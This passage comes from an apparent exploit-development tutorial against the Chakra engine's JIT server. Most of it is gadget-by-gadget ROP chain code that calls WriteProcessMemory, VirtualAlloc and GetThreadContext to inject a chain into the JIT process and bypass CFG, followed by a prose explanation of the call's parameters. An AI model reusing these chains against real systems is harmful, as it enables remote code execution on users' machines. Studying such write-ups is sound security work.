write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which points to the value we want to write: the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write CONTEXT_ALL into CONTEXT.ContextFlags)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// Locate CONTEXT.Rsp and store its address in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);      // 0x1804c37c5: mov rax, qword [rcx] ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // ret gadget we want to overwrite our remote thread's RIP with
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
next();

// WriteProcessMemory() ROP chain (Number 4)
// Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPCVOID lpBuffer (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it  

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x20)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

After setting a breakpoint on the jmp rax gadget and stepping through the gadgets that update CONTEXT.Rip and save CONTEXT.Rsp, we can start executing our WriteProcessMemory ROP chain.
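The offsets those gadgets walk through can be sanity-checked with a little arithmetic. The sketch below is only an illustration and is not part of the exploit: `CONTEXT_OFFSETS` and `applyGadgetAdds` are hypothetical names, and the offsets assume the x64 CONTEXT layout (ContextFlags at 0x30, Rsp at 0x98, Rip at 0xf8).

```javascript
// x64 CONTEXT field offsets the chain depends on (assumed from the x64 layout).
const CONTEXT_OFFSETS = { ContextFlags: 0x30, Rsp: 0x98, Rip: 0xf8 };

// Hypothetical helper: total the immediates of a run of "add rax, imm ; ret" gadgets.
function applyGadgetAdds(start, adds) {
    return adds.reduce((acc, imm) => acc + imm, start);
}

// Three "add rax, 0x10" gadgets move from the buffer base to ContextFlags.
const contextFlags = applyGadgetAdds(0x0, [0x10, 0x10, 0x10]);
// "add rax, 0x68" then moves from ContextFlags to Rsp.
const rsp = applyGadgetAdds(contextFlags, [0x68]);
// "add rax, 0x60" finally moves from Rsp to Rip.
const rip = applyGadgetAdds(rsp, [0x60]);

console.log(contextFlags.toString(16), rsp.toString(16), rip.toString(16));
```

Each computed value should match the corresponding entry in `CONTEXT_OFFSETS`, which is why the chain can reuse RAX across the three steps without reloading the buffer address.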

As we can see, we set nSize to 0x100. We are copying our ROP chain into the JIT process, and the chain is much smaller than 0x100 bytes. However, instead of calculating its exact size, we can simply use 0x100 bytes, since the remote thread has a full, writable stack to work with. After setting the size, our call is in the following state:

WriteProcessMemory(
	-
	-
	-
	sizeof(rop_chain)			// Size of our ROP chain
	-
);
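To make the size choice concrete, here is a minimal sketch of the arithmetic, assuming every ROP chain entry is one 8-byte slot. `slotsCopied`, `chainFits`, and the `exampleSlots` count are hypothetical and used purely for illustration; the real chain length is not computed here.

```javascript
const QWORD = 8; // every ROP chain entry is one 64-bit slot

// Hypothetical helper: how many 8-byte slots a copy of nSize bytes covers.
function slotsCopied(nSize) {
    return Math.floor(nSize / QWORD);
}

// Hypothetical helper: does a chain of chainSlots entries fit inside nSize bytes?
function chainFits(chainSlots, nSize) {
    return chainSlots * QWORD <= nSize;
}

const exampleSlots = 20; // placeholder count, NOT the real chain length
console.log(slotsCopied(0x100), chainFits(exampleSlots, 0x100));
```

A fixed 0x100 covers 32 slots, so any chain up to that length is copied in full; the trailing bytes simply land on writable stack in the remote thread.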

The next parameter we will fix is lpBaseAddress, which will be where we want to write the ROP chain. In this case, it is the stack location, which we can leak from our preserved CONTEXT.Rsp address.

Using the same “trick” as before, we work around the +0x8 in our mov rdx, [rdx+0x8] gadget by subtracting 0x8 beforehand from the value we want to place in RDX. From here, we can clearly see we have extracted what CONTEXT.Rsp pointed to, and that is the stack within the JIT process.

Our call is in the following state:

WriteProcessMemory(
	-
	addressof(CONTEXT.Rsp),			// Address of our remote thread's stack
	-
	sizeof(rop_chain)			// Size of our ROP chain
	-
);
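The subtract-0x8 adjustment can be modelled with a toy memory map. This is a simulation only, under the assumption that the gadget behaves exactly like `mov rdx, qword [rdx+0x08]`; the addresses, the stored value, and the helper name `movRdxFromRdxPlus8` are all made up for illustration.

```javascript
// Toy memory: address -> 64-bit value. All addresses and values are made up.
const memory = new Map();
const storageSlot = 0x1000n;             // stands in for the .data storage slot
memory.set(storageSlot, 0xdeadbeefn);    // stands in for the pointer saved there

// Hypothetical model of the gadget "mov rdx, qword [rdx+0x08]".
function movRdxFromRdxPlus8(rdx) {
    return memory.get(rdx + 0x8n);
}

// Popping (slot - 0x8) into RDX makes the gadget's +0x8 land exactly on the slot.
const rdx = movRdxFromRdxPlus8(storageSlot - 0x8n);
console.log(rdx === memory.get(storageSlot));
```

The same adjustment applies to any gadget with a fixed displacement: bias the popped value by the displacement so the effective address is the one we actually want.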

Next up is the lpBuffer parameter. This parameter is very straightforward, as we can simply pop the address of the .data section of chakra.dll where our ROP chain was placed.

Our call is now in the below state:

WriteProcessMemory(
	-
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	-
);

The next (and last register-placed) parameter is our HANDLE.

We now have our call almost completed:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	-
);

Lastly, all we need to do is place a NULL value at RSP + 0x28 and set RAX to WriteProcessMemory. The full call can be seen below:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain),				// Size of our ROP chain
	NULL 						// Optional
);
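The stack slots around the call can be laid out as a small table to see why the fifth argument sits at RSP + 0x28 on entry and why the add rsp, 0x38 ; ret gadget needs seven slots after it. This is a sketch that assumes the standard x64 Windows calling convention (a return address followed by 0x20 bytes of shadow space); the `layout` array and `offsetOf` helper are hypothetical.

```javascript
const QWORD = 8;

// Stack slots as seen at function entry; index 0 is where RSP points.
const layout = [
    "return address (add rsp, 0x38 ; ret)",
    "shadow space 1", "shadow space 2", "shadow space 3", "shadow space 4",
    "lpNumberOfBytesWritten (NULL)",
    "padding 1", "padding 2",
    "next gadget",
];

// Hypothetical helper: byte offset of a labelled slot from RSP at entry.
function offsetOf(label) {
    return layout.indexOf(label) * QWORD;
}

const fifthArg = offsetOf("lpNumberOfBytesWritten (NULL)");
// The callee's ret pops slot 0, then add rsp, 0x38 skips the next seven slots.
const nextGadget = QWORD + 0x38;

console.log(fifthArg.toString(16), nextGadget === offsetOf("next gadget"));
```

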